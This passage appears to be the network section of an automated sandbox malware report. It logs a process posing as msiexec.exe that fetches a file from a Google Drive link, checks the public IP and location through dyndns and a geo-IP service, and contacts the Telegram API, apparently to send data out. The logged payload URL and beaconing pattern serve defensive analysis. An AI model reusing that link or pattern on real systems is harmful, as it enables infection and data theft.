                                                                                                                                                    Feb 20, 2025 20:02:40.509510040 CET8049990132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:40.547986984 CET49991443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:40.548032045 CET44349991104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:40.548240900 CET49991443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:40.551088095 CET49991443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:40.551132917 CET44349991104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:40.553960085 CET4999080192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:41.018157005 CET44349991104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.020670891 CET49991443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.020703077 CET44349991104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.150563002 CET44349991104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.150650024 CET44349991104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.150778055 CET49991443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.151768923 CET49991443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.158853054 CET4999080192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:41.160203934 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:41.164262056 CET8049990132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.164443016 CET4999080192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:41.165425062 CET8049992132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.165595055 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:41.165699959 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:41.171281099 CET8049992132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.849900961 CET8049992132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.851505041 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.851562977 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.851658106 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.851942062 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.851962090 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.897793055 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:42.374116898 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.375593901 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:42.375633955 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.539982080 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.540070057 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.540136099 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:42.540592909 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:42.621726990 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:42.627583027 CET8049992132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.627657890 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:42.630310059 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:42.630337954 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.630415916 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:42.630878925 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:42.630897045 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.245961905 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.246046066 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.249089956 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.249104023 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.249521017 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.253535986 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.295337915 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.484970093 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.485068083 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.485138893 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.505203009 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.229187965 CET4998080192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:49.452531099 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.452616930 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:49.452703953 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.452949047 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.452981949 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.059931993 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.061398983 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:50.061469078 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.061547041 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:50.061564922 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.358791113 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.358905077 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.358980894 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:50.359474897 CET49995443192.168.2.7149.154.167.220

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Feb 20, 2025 20:02:25.172689915 CET5066453192.168.2.71.1.1.1
                                                                                                                                                    Feb 20, 2025 20:02:25.180116892 CET53506641.1.1.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:26.321118116 CET5048553192.168.2.71.1.1.1
                                                                                                                                                    Feb 20, 2025 20:02:26.328789949 CET53504851.1.1.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:30.187308073 CET5585253192.168.2.71.1.1.1
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET53558521.1.1.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:31.712615013 CET5065953192.168.2.71.1.1.1
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET53506591.1.1.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.621654034 CET5392953192.168.2.71.1.1.1
                                                                                                                                                    Feb 20, 2025 20:02:42.629725933 CET53539291.1.1.1192.168.2.7

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Feb 20, 2025 20:02:25.172689915 CET192.168.2.71.1.1.10xfea8Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:26.321118116 CET192.168.2.71.1.1.10xd91eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.187308073 CET192.168.2.71.1.1.10x583fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.712615013 CET192.168.2.71.1.1.10xc74Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:42.621654034 CET192.168.2.71.1.1.10x2a10Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Feb 20, 2025 20:02:25.180116892 CET1.1.1.1192.168.2.70xfea8No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:26.328789949 CET1.1.1.1192.168.2.70xd91eNo error (0)drive.usercontent.google.com172.217.16.129A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET1.1.1.1192.168.2.70x583fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET1.1.1.1192.168.2.70x583fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET1.1.1.1192.168.2.70x583fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET1.1.1.1192.168.2.70x583fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET1.1.1.1192.168.2.70x583fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:30.194999933 CET1.1.1.1192.168.2.70x583fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:31.720721006 CET1.1.1.1192.168.2.70xc74No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                    Feb 20, 2025 20:02:42.629725933 CET1.1.1.1192.168.2.70x2a10No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • drive.google.com
                                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                    • api.telegram.org
                                                                                                                                                    • checkip.dyndns.org

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.749977132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:30.203558922 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:30.882239103 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:30 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                    Feb 20, 2025 20:02:30.888998032 CET127OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Feb 20, 2025 20:02:31.095360994 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:30 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                    Feb 20, 2025 20:02:32.350383997 CET127OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Feb 20, 2025 20:02:32.557322979 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:32 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.749980132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:33.204751968 CET127OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Feb 20, 2025 20:02:33.884541988 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:33 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.749982132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:34.546185017 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:35.219361067 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:35 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.749984132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:35.848886013 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:36.513233900 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:36 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.749986132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:37.141876936 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:37.806725979 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:37 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.2.749988132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:38.446244955 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:39.154953957 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:39 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.2.749990132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:39.824506998 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:40.509510040 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:40 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.2.749992132.226.247.73808180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Feb 20, 2025 20:02:41.165699959 CET151OUTGET / HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 20, 2025 20:02:41.849900961 CET273INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:41 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 104
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.749975142.250.184.2384438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:25 UTC216OUTGET /uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                                                                    Host: drive.google.com
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    2025-02-20 19:02:26 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:26 GMT
                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                    Content-Security-Policy: script-src 'nonce-HBtn0gZUGP8FUKget6us-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Server: ESF
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
